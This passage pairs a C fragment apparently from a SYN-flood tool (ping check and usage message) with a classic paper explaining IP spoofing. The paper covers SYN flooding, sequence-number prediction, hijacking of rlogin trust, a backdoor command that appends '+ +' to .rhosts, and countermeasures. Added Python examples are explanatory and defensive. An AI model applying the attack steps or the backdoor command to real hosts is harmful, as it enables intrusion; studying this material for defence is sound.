  sin.sin_addr.s_addr=nameResolve(dest);

  /* ICMP Packet assembly */
  /* We let the kernel create our IP header as it is legit */
  icmp=(struct icmphdr *)sendICMPpak;
  icmp->type=ICMP_ECHO;               /* Requesting an Echo */
  icmp->code=0;                       /* 0 for ICMP ECHO/ECHO_REPLY */
  icmp->un.echo.id=pakID;             /* To identify upon return */
  icmp->un.echo.sequence=0;           /* Not used for us */
  icmp->checksum=in_cksum((unsigned short *)icmp,64);

  fprintf(stderr,"sending ICMP_ECHO packets: ");
  for(;j<amount;j++){
    usleep(ICMPSLEEP);                /* For good measure */
    retcode=sendto(sock,sendICMPpak,64,0,(struct sockaddr *)&sin,sizeof(sin));
    if(retcode<0){
      perror("ICMP sendto err");
      exit(1);
    }
    else if(retcode!=64)fprintf(stderr,"Only wrote %d bytes",retcode);
    else fprintf(stderr,".");
  }
  HANDLERCODE=1;
  memset(&sa,0,sizeof(sa));
  sa.sa_handler=alarmHandler;         /* catch the ALARM and handle it; no SA_RESTART, */
  sigaction(SIGALRM,&sa,NULL);        /* so a blocked read() returns when it fires */
  fprintf(stderr,"\nSetting alarm timeout for 10 seconds...\n");
  alarm(10);                          /* ALARM is set b/c read() will block forever if no */
  while(1){                           /* packets arrive... (which is what we want....) */
    retcode=read(sock,(char *)&pkt,MAXPAK-1);
    if(!HANDLERCODE)return(0);        /* alarm went off: no reply, host looks unreachable */
    if(retcode<0)continue;
    /* only a reply carrying *our* id counts; the raw socket sees everyone's ICMP */
    if(pkt.icmp.type==ICMP_ECHOREPLY&&pkt.icmp.un.echo.id==pakID){
      alarm(0);
      signal(SIGALRM,SIG_DFL);
      return(1);
    }
  }
}
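The demultiplexing rule the comment above describes, as an added Python example (not part of the Neptune source): a raw ICMP socket hands read() every ICMP packet the host receives, so a reply is only ours when it is an ECHOREPLY, its checksum verifies, and its identifier is the one we put in the request. The frames, addresses and the identifier 0x1f2e (standing in for getpid() & 0xffff) are constructed for the example; the checksum routine is RFC 1071 one's-complement, the same computation as the tool's in_cksum().

```python
import ipaddress
import struct

ICMP_ECHOREPLY = 0
ICMP_ECHO = 8
IPPROTO_ICMP = 1


def in_cksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum (what the tool's in_cksum() computes)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, ident: int, seq: int, payload: bytes = b"") -> bytes:
    """ICMP echo / echo-reply message with a correct checksum (constructed test data)."""
    body = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    return struct.pack("!BBHHH", icmp_type, 0, in_cksum(body), ident, seq) + payload


def build_ipv4(src: str, dst: str, payload: bytes, proto: int = IPPROTO_ICMP) -> bytes:
    """Minimal IPv4 header (IHL=5, no options) in front of the ICMP message,
    which is how a raw ICMP socket delivers a packet to read()."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x4242, 0, 64, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", in_cksum(hdr)) + hdr[12:]
    return hdr + payload


def is_our_echo_reply(frame: bytes, our_id: int):
    """Classify one raw-socket read.  Returns (matched, reason)."""
    if len(frame) < 20:
        return False, "truncated IP header"
    ihl = (frame[0] & 0x0F) * 4                 # IP header length in bytes
    if frame[9] != IPPROTO_ICMP:
        return False, "not ICMP"
    icmp = frame[ihl:]
    if len(icmp) < 8:
        return False, "truncated ICMP header"
    if in_cksum(icmp) != 0:                     # a correct message sums to zero
        return False, "bad ICMP checksum"
    icmp_type, _code, _csum, ident, _seq = struct.unpack("!BBHHH", icmp[:8])
    if icmp_type != ICMP_ECHOREPLY:
        return False, "ICMP type %d is not ECHOREPLY" % icmp_type
    if ident != our_id:                         # someone else's ping, ignore it
        return False, "ECHOREPLY for id 0x%04x, not ours" % ident
    return True, "ECHOREPLY for our id 0x%04x" % ident


def first_reply_for_us(frames, our_id: int):
    """Index of the first frame that is our echo reply, or None (the alarm case)."""
    for n, frame in enumerate(frames):
        if is_our_echo_reply(frame, our_id)[0]:
            return n
    return None


OUR_ID = 0x1F2E   # stand-in for getpid() & 0xffff

# Constructed traffic as the raw socket would see it, in arrival order.
SAMPLE_FRAMES = [
    build_ipv4("192.0.2.10", "192.0.2.1", build_icmp(ICMP_ECHO, OUR_ID, 0)),         # a request, not a reply
    build_ipv4("192.0.2.20", "192.0.2.1", build_icmp(ICMP_ECHOREPLY, 0x0BAD, 0)),    # reply to another process
    build_ipv4("192.0.2.30", "192.0.2.1",
               build_icmp(ICMP_ECHOREPLY, OUR_ID, 0)[:-1] + b"\xff"),                 # ours, but corrupted
    build_ipv4("192.0.2.40", "192.0.2.1", build_icmp(ICMP_ECHOREPLY, OUR_ID, 0, b"pong")),  # ours
]

if __name__ == "__main__":
    for n, frame in enumerate(SAMPLE_FRAMES):
        print(n, is_our_echo_reply(frame, OUR_ID))
    print("first reply for us:", first_reply_for_us(SAMPLE_FRAMES, OUR_ID))
```

Run stand-alone it prints the verdict for each constructed frame; only the last one is accepted, which is the check slickPing() needs before it can call a host reachable.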


/*
 *  SIGALRM signal handler.  Souper simple.
 */

void alarmHandler(int sig){
  (void)sig;
  HANDLERCODE=0;                      /* shame on me for using global vars */
  alarm(0);
  signal(SIGALRM,SIG_DFL);
}

/*
 *  Usage function...
 */

void usage(nomenclature)
char *nomenclature;
{
  fprintf(stderr,"\n\nUSAGE: %s \n\t-s unreachable_host \n\t-t target_host \n\t-p port [-8 (infinity switch)] \n\t-a amount_of_SYNs\n",nomenclature);
  exit(0);
}
/*
 *  Demon.  Backgrounding procedure and looping stuff.
 */

void demon(sock,unreachable,target,port,amount,interval,ttl)
int sock;
char *unreachable;
char *target;
int port;
int amount;
int interval;
int ttl;
{
  fprintf(stderr,"\nSorry Daemon mode not available in this version\n");
  exit(0);
}


comments to route@infonexus.com


The purpose of this paper is to explain IP-spoofing to the
masses.  It assumes little more than a working knowledge of Unix and
TCP/IP.  Oh, and that yur not a moron...

IP-spoofing is a complex technical attack that is made up of
several components.  (In actuality, IP-spoofing is not the attack, but
a step in the attack.  The attack is actually trust-relationship
exploitation.  However, in this paper, IP-spoofing will refer to the
whole attack.)  In this paper, I will explain the attack in detail,
including the relevant operating system and networking information.


[SECTION I. BACKGROUND INFORMATION] 


--[ The Players ]--


A: Target host

B: Trusted host

X: Unreachable host

Z: Attacking host

1(2): Host 1 masquerading as host 2


--[ The Figures ]--


There are several figures in the paper and they are to be
interpreted as per the following example:


tick    host a    control     host b
1       A         ---SYN--->  B

tick: A tick of time.  There is no distinction made as to *how*
much time passes between ticks, just that time passes.  It's generally
not a great deal.
host a: A machine participating in a TCP-based conversation.
control: This field shows any relevant control bits set in the TCP
header and the direction the data is flowing.
host b: A machine participating in a TCP-based conversation.


In this case, at the first referenced point in time host a is sending
a TCP segment to host b with the SYN bit on.  Unless stated, we are
generally not concerned with the data portion of the TCP segment.


--[ Trust Relationships ]--


In the Unix world, trust can be given all too easily.  Say you
have an account on machine A, and on machine B.  To facilitate going
betwixt the two with a minimum amount of hassle, you want to set up a
full-duplex trust relationship between them.  In your home directory
at A you create a .rhosts file: `echo "B username" > ~/.rhosts`.  In
your home directory at B you create a .rhosts file: `echo "A username"
> ~/.rhosts`.  (Alternately, root can set up similar rules in
/etc/hosts.equiv, the difference being that the rules are hostwide,
rather than just on an individual basis.)  Now, you can use any of the
r* commands without that annoying hassle of password authentication.
These commands will allow address-based authentication, which will
grant or deny access based off of the IP address of the service
requestor.


--[ Rlogin ]--


Rlogin is a simple client-server based protocol that uses TCP
as its transport.  Rlogin allows a user to login remotely from one
host to another, and, if the target machine trusts the other, rlogin
will allow the convenience of not prompting for a password.  It will
instead have authenticated the client via the source IP address.  So,
from our example above, we can use rlogin to remotely login to A from
B (or vice-versa) and not be prompted for a password.


--[ Internet Protocol ]--


IP is the connectionless, unreliable network protocol in the
TCP/IP suite.  It has two 32-bit header fields to hold address
information.  IP is also the busiest of all the TCP/IP protocols as
almost all TCP/IP traffic is encapsulated in IP datagrams.  IP's job
is to route packets around the network.  It provides no mechanism for
reliability or accountability; for that, it relies on the upper
layers.  IP simply sends out datagrams and hopes they make it intact.
If they don't, IP can try to send an ICMP error message back to the
source, however this packet can get lost as well.  (ICMP is Internet
Control Message Protocol and it is used to relay network conditions
and different errors to IP and the other layers.)  IP has no means to
guarantee delivery.  Since IP is connectionless, it does not maintain
any connection state information.  Each IP datagram is sent out without
regard to the last one or the next one.  This, along with the fact that
it is trivial to modify the IP stack to allow an arbitrarily chosen IP
address in the source (and destination) fields, makes IP easily subvertible.


--[ Transmission Control Protocol ]--


TCP is the connection-oriented, reliable transport protocol
in the TCP/IP suite.  Connection-oriented simply means that the two
hosts participating in a discussion must first establish a connection
before data may change hands.  Reliability is provided in a number of
ways but the only two we are concerned with are data sequencing and
acknowledgement.  TCP assigns sequence numbers to every segment and
acknowledges any and all data segments received from the other end.
(ACK's consume a sequence number, but are not themselves ACK'd.)

This reliability makes TCP harder to fool than IP.


--[ Sequence Numbers, Acknowledgements and other flags ]--


Since TCP is reliable, it must be able to recover from
lost, duplicated, or out-of-order data.  By assigning a sequence
number to every byte transferred, and requiring an acknowledgement from
the other end upon receipt, TCP can guarantee reliable delivery.  The
receiving end uses the sequence numbers to ensure proper ordering of
the data and to eliminate duplicate data bytes.

TCP sequence numbers can simply be thought of as 32-bit
counters.  They range from 0 to 4,294,967,295.  Every byte of
data exchanged across a TCP connection (along with certain flags)
is sequenced.  The sequence number field in the TCP header will
contain the sequence number of the *first* byte of data in the
TCP segment.  The acknowledgement number field in the TCP header
holds the value of the next *expected* sequence number, and also
acknowledges *all* data up through this ACK number minus one.

TCP uses the concept of window advertisement for flow
control.  It uses a sliding window to tell the other end how much
data it can buffer.  Since the window size is 16 bits a receiving TCP
can advertise up to a maximum of 65535 bytes.  Window advertisement
can be thought of as an advertisement from one TCP to the other of how
high acceptable sequence numbers can be.

Other TCP header flags of note are RST (reset), PSH (push)
and FIN (finish).  If a RST is received, the connection is
immediately torn down.  RSTs are normally sent when one end
receives a segment that just doesn't jive with the current connection
(we will encounter an example below).  The PSH flag tells the
receiver to pass all the data it has queued to the application, as
soon as possible.  The FIN flag is the way an application begins a
graceful close of a connection (connection termination is a 4-way
process).  When one end receives a FIN, it ACKs it, and does not
expect to receive any more data (sending is still possible, however).


--[ TCP Connection Establishment ]--


In order to exchange data using TCP, hosts must establish
a connection.  TCP establishes a connection in a 3 step process called
the 3-way handshake.  If machine A is running an rlogin client and
wishes to connect to an rlogin daemon on machine B, the process is as
follows:


fig(1)
1   A ---SYN---> B
2   A <---SYN/ACK--- B
3   A ---ACK---> B


At (1) the client is telling the server that it wants a connection.
This is the SYN flag's only purpose.  The client is telling the
server that the sequence number field is valid, and should be checked.
The client will set the sequence number field in the TCP header to
its ISN (initial sequence number).  The server, upon receiving this
segment (2) will respond with its own ISN (therefore the SYN flag is
on) and an ACKnowledgement of the client's first segment (which is the
client's ISN+1).  The client then ACK's the server's ISN (3).  Now,
data transfer may take place.


--[ The ISN and Sequence Number Incrementation ]--


It is important to understand how sequence numbers are
initially chosen, and how they change with respect to time.  The
initial sequence number when a host is bootstrapped is initialized
to 1.  (TCP actually calls this variable 'tcp_iss' as it is the initial
*send* sequence number.  The other sequence number variable,
'tcp_irs' is the initial *receive* sequence number and is learned
during the 3-way connection establishment.  We are not going to worry
about the distinction.)  This practice is wrong, and is acknowledged
as so in a comment in the tcp_init() function where it appears.  The ISN
is incremented by 128,000 every second, which causes the 32-bit ISN
counter to wrap every 9.32 hours if no connections occur.  However,
each time a connect() is issued, the counter is incremented by
64,000.


One important reason behind this predictability is to
minimize the chance that data from an older stale incarnation
(that is, from the same 4-tuple of the local and remote
IP-addresses and TCP ports) of the current connection could arrive
and foul things up.  The concept of the 2MSL wait time applies
here, but is beyond the scope of this paper.  If sequence
numbers were chosen at random when a connection arrived, no
guarantees could be made that the sequence numbers would be different
from a previous incarnation.  If some data that was stuck in a
routing loop somewhere finally freed itself and wandered into the new
incarnation of its old connection, it could really foul things up.


--[ Ports ]--


To grant simultaneous access to the TCP module, TCP provides
a user interface called a port.  Ports are used by the kernel to
identify network processes.  These are strictly transport layer
entities (that is to say that IP could care less about them).
Together with an IP address, a TCP port provides an endpoint
for network communications.  In fact, at any given moment *all*
Internet connections can be described by 4 numbers: the source IP
address and source port and the destination IP address and destination
port.  Servers are bound to 'well-known' ports so that they may be
located on a standard port on different systems.  For example, the
rlogin daemon sits on TCP port 513.


[SECTION II. THE ATTACK]


...The devil finds work for idle hands....


--[ Briefly... ]--


IP-spoofing consists of several steps, which I will
briefly outline here, then explain in detail.  First, the target host
is chosen.  Next, a pattern of trust is discovered, along with a
trusted host.  The trusted host is then disabled, and the target's TCP
sequence numbers are sampled.  The trusted host is impersonated, the
sequence numbers guessed, and a connection attempt is made to a
service that only requires address-based authentication.  If
successful, the attacker executes a simple command to leave a
backdoor.


--[ Needful Things ]--


There are a couple of things one needs to wage this attack:


brain, mind, or other thinking device
target host
trusted host
attacking host (with root access)
IP-spoofing software


Generally the attack is made from the root account on the attacking
host against the root account on the target.  If the attacker is
going to all this trouble, it would be stupid not to go for root.
(Since root access is needed to wage the attack, this should not
be an issue.)
--[ IP-Spoofing is a 'Blind Attack' ]--


One often overlooked, but critical factor in IP-spoofing
is the fact that the attack is blind.  The attacker is going to be
taking over the identity of a trusted host in order to subvert the
security of the target host.  The trusted host is disabled using the
method described below.  As far as the target knows, it is carrying on
a conversation with a trusted pal.  In reality, the attacker is
sitting off in some dark corner of the Internet, forging packets
purportedly from this trusted host while it is locked up in a denial
of service battle.  The IP datagrams sent with the forged IP-address
reach the target fine (recall that IP is a connectionless-oriented
protocol-- each datagram is sent without regard for the other end)
but the datagrams the target sends back (destined for the trusted
host) end up in the bit-bucket.  The attacker never sees them.  The
intervening routers know where the datagrams are supposed to go.  They
are supposed to go to the trusted host.  As far as the network layer is
concerned, this is where they originally came from, and this is where
responses should go.  Of course once the datagrams are routed there,
and the information is demultiplexed up the protocol stack, and
reaches TCP, it is discarded (the trusted host's TCP cannot respond--
see below).  So the attacker has to be smart and *know* what was sent,
and *know* what response the server is looking for.  The attacker
cannot see what the target host sends, but she can *predict* what it
will send; that coupled with the knowledge of what it *will* send,
allows the attacker to work around this blindness.


--[ Patterns of Trust ]--


After a target is chosen the attacker must determine the
patterns of trust (for the sake of argument, we are going to assume
the target host *does* in fact trust somebody.  If it didn't, the
attack would end here).  Figuring out who a host trusts may or may
not be easy.  A 'showmount -e' may show where filesystems are
exported, and rpcinfo can give out valuable information as well.
If enough background information is known about the host, it should
not be too difficult.  If all else fails, trying neighboring IP
addresses in a brute force effort may be a viable option.


--[ Trusted Host Disabling Using the Flood of Sins ]--


Once the trusted host is found, it must be disabled.  Since
the attacker is going to impersonate it, she must make sure this host
cannot receive any network traffic and foul things up.  There are
many ways of doing this, the one I am going to discuss is TCP SYN
flooding.

A TCP connection is initiated with a client issuing a
request to a server with the SYN flag on in the TCP header.  Normally
the server will issue a SYN/ACK back to the client identified by the
32-bit source address in the IP header.  The client will then send an
ACK to the server (as we saw in figure 1 above) and data transfer
can commence.  There is an upper limit of how many concurrent SYN
requests TCP can process for a given socket, however.  This limit
is called the backlog, and it is the length of the queue where
incoming (as yet incomplete) connections are kept.  This queue limit
applies to both the number of incomplete connections (the 3-way
handshake is not complete) and the number of completed connections
that have not been pulled from the queue by the application by way of
the accept() system call.  If this backlog limit is reached, TCP will
silently discard all incoming SYN requests until the pending
connections can be dealt with.  Therein lies the attack.

The attacking host sends several SYN requests to the TCP port
she desires disabled.  The attacking host also must make sure that
the source IP-address is spoofed to be that of another, currently
unreachable host (the target TCP will be sending its response to
this address).  (IP may inform TCP that the host is unreachable,
but TCP considers these errors to be transient and leaves the
resolution of them up to IP (reroute the packets, etc) effectively
ignoring them.)  The IP-address must be unreachable because the
attacker does not want any host to receive the SYN/ACKs that will be
coming from the target TCP (this would result in a RST being sent to
the target TCP, which would foil our attack).  The process is as
follows:

fig(2)
1   Z(x) ---SYN---> B
    Z(x) ---SYN---> B
    Z(x) ---SYN---> B
    Z(x) ---SYN---> B
    Z(x) ---SYN---> B
2   X <---SYN/ACK--- B
    X <---SYN/ACK--- B
3   X <---RST--- B


At (1) the attacking host sends a multitude of SYN requests to the
target (remember the target in this phase of the attack is the
trusted host) to fill its backlog queue with pending connections.
(2) The target responds with SYN/ACKs to what it believes is the
source of the incoming SYNs.  During this time all further requests
to this TCP port will be ignored.

Different TCP implementations have different backlog sizes.
BSD generally has a backlog of 5 (Linux has a backlog of 6).  There
is also a 'grace' margin of 3/2.  That is, TCP will allow up to
backlog*3/2+1 connections.  This will allow a socket one connection
even if it calls listen with a backlog of 0.
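Added example, not part of the article or of the Neptune code: the backlog arithmetic above turned into a check a defender can run over `netstat -an` style output. It counts half-open (SYN_RECV / SYN_RCVD) entries per listening port and reports any port that has reached backlog*3/2+1, the point at which the text says TCP silently discards further SYNs. The netstat lines are constructed for the example and the BSD default backlog of 5 is assumed; the function names are the example's own.

```python
import re
from collections import defaultdict


def effective_backlog(backlog: int) -> int:
    """Pending connections TCP really allows for listen(backlog): backlog*3/2+1."""
    return backlog * 3 // 2 + 1


# Constructed sample in the layout of `netstat -an` (Linux prints SYN_RECV,
# BSD prints SYN_RCVD for the same half-open state).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address      Foreign Address        State
tcp        0      0 10.1.1.5:513       198.51.100.77:1023     SYN_RECV
tcp        0      0 10.1.1.5:513       198.51.100.77:1024     SYN_RECV
tcp        0      0 10.1.1.5:513       198.51.100.77:1025     SYN_RECV
tcp        0      0 10.1.1.5:513       198.51.100.77:1026     SYN_RECV
tcp        0      0 10.1.1.5:513       198.51.100.77:1027     SYN_RECV
tcp        0      0 10.1.1.5:513       198.51.100.77:1028     SYN_RECV
tcp        0      0 10.1.1.5:513       198.51.100.77:1029     SYN_RECV
tcp        0      0 10.1.1.5:513       198.51.100.77:1030     SYN_RECV
tcp        0      0 10.1.1.5:25        203.0.113.4:40112      ESTABLISHED
tcp        0      0 10.1.1.5:25        203.0.113.9:40113      SYN_RECV
tcp        0      0 0.0.0.0:513        0.0.0.0:*              LISTEN
"""

LINE_RE = re.compile(r"^tcp\s+\d+\s+\d+\s+([^\s:]+):(\d+)\s+([^\s:]+):(\d+|\*)\s+(\S+)\s*$")
HALF_OPEN = {"SYN_RECV", "SYN_RCVD"}


def half_open_by_port(netstat_text: str) -> dict:
    """Map local port -> list of peer addresses holding a half-open connection."""
    pending = defaultdict(list)
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # header line, udp, unix sockets...
        _laddr, lport, raddr, _rport, state = m.groups()
        if state in HALF_OPEN:
            pending[int(lport)].append(raddr)
    return dict(pending)


def flooded_ports(netstat_text: str, backlog: int = 5) -> dict:
    """Ports whose half-open count has reached the effective backlog.  A queue
    full of SYN_RECV entries that all point at one peer which never finishes
    the handshake is the footprint of the flood described above."""
    limit = effective_backlog(backlog)
    report = {}
    for port, peers in half_open_by_port(netstat_text).items():
        if len(peers) >= limit:
            report[port] = {"half_open": len(peers), "limit": limit,
                            "peers": sorted(set(peers))}
    return report


if __name__ == "__main__":
    for port, info in flooded_ports(SAMPLE_NETSTAT).items():
        print("port %d: %d half-open (limit %d) from %s"
              % (port, info["half_open"], info["limit"], ", ".join(info["peers"])))
```

With the sample, port 513 is reported with 8 half-open connections against a limit of 8, all from one peer; port 25, with a single SYN_RECV, is not. On a host that really is under this flood the peer address will be the unreachable host the SYNs were forged from, so it will never answer the SYN/ACKs either.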


AuthNote: [For a much more in-depth treatment of TCP SYN
flooding, see my definitive paper on the subject.  It covers the
whole process in detail, in both theory, and practice.  There is
robust working code, a statistical analysis, and a lengthy paper.
Look for it in issue 49 of Phrack.  -daemon9 6/96]


--[ Sequence Number Sampling and Prediction ]--


Now the attacker needs to get an idea of where in the 32-bit
sequence number space the target's TCP is.  The attacker connects to
a TCP port on the target (SMTP is a good choice) just prior to launching
the attack and completes the three-way handshake.  The process is
exactly the same as fig(1), except that the attacker will save the
value of the ISN sent by the target host.  Often times, this process is
repeated several times and the final ISN sent is stored.  The attacker
needs to get an idea of what the RTT (round-trip time) from the target
to her host is like.  (The process can be repeated several times, and an
average of the RTT's is calculated.)  The RTT is necessary in being
able to accurately predict the next ISN.  The attacker has the baseline
(the last ISN sent) and knows how the sequence numbers are incremented
(128,000/second and 64,000 per connect) and now has a good idea of
how long it will take an IP datagram to travel across the Internet to
reach the target (approximately half the RTT, as most times the
routes are symmetrical).  After the attacker has this information, she
immediately proceeds to the next phase of the attack (if another TCP
connection were to arrive on any port of the target before the
attacker was able to continue the attack, the ISN predicted by the
attacker would be off by 64,000 from what was predicted).

When the spoofed segment makes its way to the target,
several different things may happen depending on the accuracy of
the attacker's prediction:
- If the sequence number is EXACTly where the receiving TCP expects
it to be, the incoming data will be placed on the next available
position in the receive buffer.
- If the sequence number is LESS than the expected value the data
byte is considered a retransmission, and is discarded.
- If the sequence number is GREATER than the expected value but
still within the bounds of the receive window, the data byte is
considered to be a future byte, and is held by TCP, pending the
arrival of the other missing bytes.
- If a segment arrives with a sequence number GREATER than the
expected value and NOT within the bounds of the receive window the
segment is dropped, and TCP will send a segment back with the
*expected* sequence number.
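The four cases above, as an added Python example (not from the article): a classifier that takes the first sequence number of an arriving segment together with the receiver's RCV.NXT and RCV.WND and returns what the receiving TCP does with it. The comparisons use 32-bit wrap-around (serial) arithmetic, so the rules still come out right when RCV.NXT sits just below 4,294,967,295 and the window crosses zero, a case the plain "less than / greater than" wording glosses over. The function names and the sample values are the example's own.

```python
SEQ_MASK = 0xFFFFFFFF


def seq_before(a: int, b: int) -> bool:
    """True if sequence number a precedes b in 32-bit wrap-around arithmetic,
    i.e. the signed 32-bit difference a-b is negative (RFC 793 style)."""
    return ((a - b) & SEQ_MASK) > 0x7FFFFFFF


def classify_segment(seg_seq: int, rcv_nxt: int, rcv_wnd: int) -> str:
    """What a receiving TCP does with a data segment whose first byte carries
    sequence number seg_seq, given RCV.NXT (next expected byte) and RCV.WND.

      in-order       : seg_seq == RCV.NXT, data goes into the next buffer slot
      retransmission : seg_seq <  RCV.NXT, discarded as already seen
      future         : RCV.NXT < seg_seq < RCV.NXT+RCV.WND, queued until the gap fills
      out-of-window  : at or beyond the window edge, dropped; the receiver answers
                       with a segment acknowledging RCV.NXT, the value it expected
    """
    if seg_seq == rcv_nxt:
        return "in-order"
    if seq_before(seg_seq, rcv_nxt):
        return "retransmission"
    window_end = (rcv_nxt + rcv_wnd) & SEQ_MASK      # first byte the window does NOT cover
    if seq_before(seg_seq, window_end):
        return "future"
    return "out-of-window"


def acceptable_range(rcv_nxt: int, rcv_wnd: int) -> tuple:
    """The [RCV.NXT, RCV.NXT+RCV.WND) interval as two 32-bit values; the second
    may be numerically smaller than the first when the window wraps."""
    return rcv_nxt & SEQ_MASK, (rcv_nxt + rcv_wnd) & SEQ_MASK


if __name__ == "__main__":
    # constructed receiver state: expected byte just below the wrap point, 64K window
    rcv_nxt, wnd = 0xFFFFFFF0, 65535
    print("window covers [%08x, %08x)" % acceptable_range(rcv_nxt, wnd))
    for seq in (0xFFFFFFF0, 0xFFFFFFE0, 0x00000010, 0x00010000):
        print("seq=%08x -> %s" % (seq, classify_segment(seq, rcv_nxt, wnd)))
```

Note the wrap-around case: with RCV.NXT = 0xFFFFFFF0 a segment at 0x00000010 is numerically far smaller than the expected value, yet it is 32 bytes ahead and is queued as future data, while 0xFFFFFFE0 is a retransmission. An implementation that compares sequence numbers as plain unsigned integers gets both of these wrong.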


--[ Subversion... ]--


Here is where the main thrust of the attack begins:


fig(3)
1   Z(b) ---SYN---> A
2   B <---SYN/ACK--- A
3   Z(b) ---ACK---> A
4   Z(b) ---PSH---> A


The attacking host spoofs her IP address to be that of the trusted
host (which should still be in the death-throes of the D.O.S. attack)
and sends its connection request to port 513 on the target (1).  At
(2), the target responds to the spoofed connection request with a
SYN/ACK, which will make its way to the trusted host (which, if it
*could* process the incoming TCP segment, would consider it an
error, and immediately send a RST to the target).  If everything goes
according to plan, the SYN/ACK will be dropped by the gagged trusted
host.  After (1), the attacker must back off for a bit to give the
target ample time to send the SYN/ACK (the attacker cannot see this
segment).  Then, at (3) the attacker sends an ACK to the target with
the predicted sequence number (plus one, because we're ACKing it).
If the attacker is correct in her prediction, the target will accept
the ACK.  The target is compromised and data transfer can
commence (4).

Generally, after compromise, the attacker will insert a
backdoor into the system that will allow a simpler way of intrusion.
(Often a `cat + + >> ~/.rhosts` is done.  This is a good idea for
several reasons: it is quick, allows for simple re-entry, and is not
interactive.  Remember the attacker cannot see any traffic coming from
the target, so any responses are sent off into oblivion.)
--[ Why it Works ]--


IP-Spoofing works because trusted services only rely on
network address based authentication.  Since IP is easily duped,
address forgery is not difficult.  The hardest part of the attack is
in the sequence number prediction, because that is where the guesswork
comes into play.  Reduce unknowns and guesswork to a minimum, and
the attack has a better chance of succeeding.  Even a machine that
wraps all its incoming TCP bound connections with Wietse Venema's TCP
wrappers is still vulnerable to the attack.  TCP wrappers rely on a
hostname or an IP address for authentication...


[SECTION III. PREVENTIVE MEASURES]


...A stitch in time, saves nine...


--[ Be Un-trusting and Un-trustworthy ]--


One easy solution to prevent this attack is not to rely
on address-based authentication.  Disable all the r* commands,
remove all .rhosts files and empty out the /etc/hosts.equiv file.
This will force all users to use other means of remote access
(telnet, ssh, skey, etc).


--[ Packet Filtering ]--


If your site has a direct connect to the Internet, you
can use your router to help you out.  First make sure only hosts
on your internal LAN can participate in trust-relationships (no
internal host should trust a host outside the LAN).  Then simply
filter out *all* traffic from the outside (the Internet) that
purports to come from the inside (the LAN).


--[ Cryptographic Methods ]--


An obvious method to deter IP-spoofing is to require
all network traffic to be encrypted and/or authenticated.  While
several solutions exist, it will be a while before such measures are
deployed as de facto standards.


--[ Initial Sequence Number Randomizing ]--


Since the sequence numbers are not chosen randomly (or
incremented randomly) this attack works.  Bellovin describes a
fix for TCP that involves partitioning the sequence number space.
Each connection would have its own separate sequence number space.
The sequence numbers would still be incremented as before, however,
there would be no obvious or implied relationship between the
numbering in these spaces.  Suggested is the following formula:


ISN = M + F(localhost, localport, remotehost, remoteport)


Where M is the 4 microsecond timer and F is a cryptographic hash.
F must not be computable from the outside or the attacker could
still guess sequence numbers.  Bellovin suggests F be a hash of
the connection-id and a secret vector (a random number, or a host
related secret combined with the machine's boot time).
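Added Python example (not from the article or any TCP implementation) covering both the ISN section earlier in the paper and the fix described here. It models the two generators side by side: the 1-at-boot, +128,000 per second, +64,000 per connect() counter the paper describes, and Bellovin's partitioned ISN = M + F(localhost, localport, remotehost, remoteport) with a per-boot secret. The demo samples one ISN, waits two seconds, and asks whether the paper's arithmetic predicts the ISN handed to the next connection (a different 4-tuple): it does for the counter and not for the hashed scheme, because F is keyed with a secret the observer does not have. Assumptions: SHA-256 truncated to 32 bits stands in for the hash (RFC 1948 suggests MD5), M ticks every 4 microseconds, and all hosts, ports and the secret are constructed.

```python
import hashlib
import os

ISN_MOD = 1 << 32


class ClassicISN:
    """The generator the paper describes: tcp_iss starts at 1 at boot, grows by
    128,000 every second and by 64,000 on every connect()."""

    def __init__(self):
        self.iss = 1

    def tick(self, seconds: float) -> None:
        self.iss = (self.iss + int(128000 * seconds)) % ISN_MOD

    def connect(self) -> int:
        isn = self.iss                          # ISN handed to this connection
        self.iss = (self.iss + 64000) % ISN_MOD
        return isn


def predict_classic(observed_isn: int, seconds_elapsed: float, connects_since: int = 1) -> int:
    """The paper's arithmetic against ClassicISN: last sampled ISN plus the
    time-based and per-connect increments (128,000/s and 64,000 per connect)."""
    return (observed_isn + int(128000 * seconds_elapsed) + 64000 * connects_since) % ISN_MOD


def classic_wrap_hours() -> float:
    """How long the 32-bit counter takes to wrap at 128,000/s with no connections."""
    return ISN_MOD / 128000 / 3600


class Rfc1948ISN:
    """Bellovin's partitioned space: ISN = M + F(localhost, localport, remotehost,
    remoteport, secret).  M is the 4-microsecond clock; F is a keyed hash whose
    secret is chosen per boot and never leaves the host (assumption: SHA-256
    truncated to 32 bits stands in for the hash)."""

    def __init__(self, secret=None):
        self.secret = secret if secret is not None else os.urandom(16)
        self.m = 0

    def tick(self, seconds: float) -> None:
        self.m = (self.m + int(250000 * seconds)) % ISN_MOD     # 4 us per tick

    def connect(self, lhost: str, lport: int, rhost: str, rport: int) -> int:
        conn_id = f"{lhost}:{lport}-{rhost}:{rport}".encode()
        f = int.from_bytes(hashlib.sha256(self.secret + conn_id).digest()[:4], "big")
        return (self.m + f) % ISN_MOD


def demo() -> tuple:
    """Sample one ISN, wait two seconds, then check whether the classic rule
    predicts the ISN of the next connection (a different 4-tuple) for each generator.
    Returns (classic_predictable, rfc1948_predictable)."""
    classic = ClassicISN()
    classic.tick(100)                                   # host has been up 100 s
    sampled = classic.connect()                         # a probe connection to SMTP
    classic.tick(2)
    actual = classic.connect()                          # next ISN the host hands out
    classic_predictable = predict_classic(sampled, 2) == actual

    rfc = Rfc1948ISN(secret=b"constructed per-boot secret")
    rfc.tick(100)
    sampled = rfc.connect("198.51.100.5", 1025, "203.0.113.7", 25)
    rfc.tick(2)
    actual = rfc.connect("198.51.100.5", 1026, "203.0.113.7", 513)
    rfc_predictable = predict_classic(sampled, 2) == actual
    return classic_predictable, rfc_predictable


if __name__ == "__main__":
    print("classic counter wraps every %.2f hours" % classic_wrap_hours())
    print("predictable from one sample (classic, rfc1948):", demo())
```

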